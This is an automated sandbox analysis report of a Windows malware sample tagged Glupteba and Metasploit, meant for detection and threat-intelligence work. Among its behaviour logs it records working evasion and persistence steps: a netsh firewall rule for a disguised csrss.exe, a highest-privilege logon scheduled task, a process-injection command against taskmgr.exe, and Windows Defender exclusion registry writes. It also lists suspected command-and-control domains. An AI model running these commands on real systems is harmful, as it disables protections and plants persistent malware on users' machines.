Malware Analysis Report

2025-08-10 17:59

Sample ID 240116-lfqd8shhh6
Target 5f8adc5247685228db6a92ca9f38f667
SHA256 1d3b1052852b5248241435db8754373ea350b9d9a6980fa89fb5cc3eb07eb45a
Tags
glupteba metasploit backdoor dropper evasion loader trojan discovery persistence ransomware rootkit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1d3b1052852b5248241435db8754373ea350b9d9a6980fa89fb5cc3eb07eb45a

Threat Level: Known bad

The file 5f8adc5247685228db6a92ca9f38f667 was found to be: Known bad.

Malicious Activity Summary

glupteba metasploit backdoor dropper evasion loader trojan discovery persistence ransomware rootkit

Glupteba payload

Windows security bypass

Glupteba

MetaSploit

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Drops file in Drivers directory

Executes dropped EXE

Windows security modification

Loads dropped DLL

Adds Run key to start application

Checks installed software on the system

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Drops file in System32 directory

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Program crash

Creates scheduled task(s)

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Modifies data under HKEY_USERS

GoLang User-Agent

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-16 09:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-16 09:28

Reported

2024-01-16 09:31

Platform

win10v2004-20231215-en

Max time kernel

2s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe

"C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"

C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe

"C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1824 -ip 1824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 692

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe ""

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 21.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 humisnee.com udp
NL 37.48.65.149:443 humisnee.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 survey-smiles.com udp
US 199.59.243.225:80 survey-smiles.com tcp
US 8.8.8.8:53 149.65.48.37.in-addr.arpa udp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 bd2fd7fb-9100-4727-be0a-497392abe831.ninhaine.com udp
US 8.8.8.8:53 server5.ninhaine.com udp
CZ 46.8.8.100:443 server5.ninhaine.com tcp
CZ 46.8.8.100:443 server5.ninhaine.com tcp
CZ 46.8.8.100:443 server5.ninhaine.com tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 100.8.8.46.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 spolaect.info udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 175.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 209.178.17.96.in-addr.arpa udp
CZ 46.8.8.100:443 server5.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp

Files

memory/1824-2-0x0000000003010000-0x0000000003936000-memory.dmp

memory/1824-3-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1824-1-0x0000000002BD0000-0x000000000300F000-memory.dmp

memory/1824-5-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1824-6-0x0000000003010000-0x0000000003936000-memory.dmp

memory/1296-7-0x0000000002BE0000-0x0000000003024000-memory.dmp

memory/1296-8-0x0000000003030000-0x0000000003956000-memory.dmp

memory/1296-9-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/1296-17-0x0000000000400000-0x0000000000D41000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 5e819a1899d48715c579730cfbbc5e6d
SHA1 9df020ed8a30355f488117204750b42f4092422c
SHA256 206ac381ed9f36920bdf8d43ce0e2fd7cb40f8fb6e2013f92dd09b2d587e2d8e
SHA512 21d580e08b291197318401bb320216a5c20581a80665e886eda879dcb4b639c3caa36c143ea718708d6f9981b24de95631b165001541b59d0ecd5267e63784a7

C:\Windows\rss\csrss.exe

MD5 9b45493f2c7aa5f3748b94bdaec93938
SHA1 4318d18b9a993303ebf4de61fb7fc56a3e83e2b0
SHA256 871ac3759c104f4feb13f18eb0743021cfe2237ed741151003f1f345244a4b91
SHA512 b8d62e2ba73e1e93028d94e0e37704f0af8ee87d02253d2252e610f3d3605839b60e2c507da82d3d137e421c5c3ee903082eaa87912a36c5834f4c9ccee11edd

memory/3364-20-0x0000000002E00000-0x0000000003300000-memory.dmp

memory/3364-21-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-22-0x0000000000400000-0x0000000000D41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d689b6e8f3e429e69c5065fe32917187
SHA1 b72b4a78d8c6a50f99b13a44e092757ed2c4059e
SHA256 61bb5ec184c1d483131162afedc892a34b1c28513e6deeae4a52aef9f189eb11
SHA512 1b62f0aac9f7a7aa3bcf8abcc314d52ea7fc8341f79e1861953707ef054a59023eedfd1e78f54927515a0dd63c8479e23d39a8a24a2064af62041e2f7202ea9c

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 08afd979d253be886cc23648f27b543b
SHA1 83a92fff16753e371fa3172ae906a86f409cd57b
SHA256 0124d95f9a69540aade8e612ce96108d40c8dd2a9ba6f0fb057c88920a09c307
SHA512 8050c8f9d4bebe878936e0ddc4c5cda089e3476cf61101a3cc88592fa7d960f6466b0d44682f056456585f98a6ef6fe3ccd52200cd1c8b7ab168d26b904d77b7

memory/3364-28-0x0000000002E00000-0x0000000003300000-memory.dmp

memory/3364-29-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-30-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-31-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-32-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-33-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-34-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-35-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-36-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-37-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-38-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-39-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-40-0x0000000000400000-0x0000000000D41000-memory.dmp

memory/3364-41-0x0000000000400000-0x0000000000D41000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-16 09:28

Reported

2024-01-16 09:31

Platform

win7-20231215-en

Max time kernel

148s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyWater = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\5f8adc5247685228db6a92ca9f38f667.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyWater = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\5f8adc5247685228db6a92ca9f38f667.exe = "0" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Windows\CurrentVersion\Run\HolyWater = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A

Checks installed software on the system

discovery

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
File created C:\Windows\Logs\CBS\CbsPersist_20240116092854.cab C:\Windows\system32\makecab.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Windows\rss\csrss.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\5f8adc5247685228db6a92ca9f38f667.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
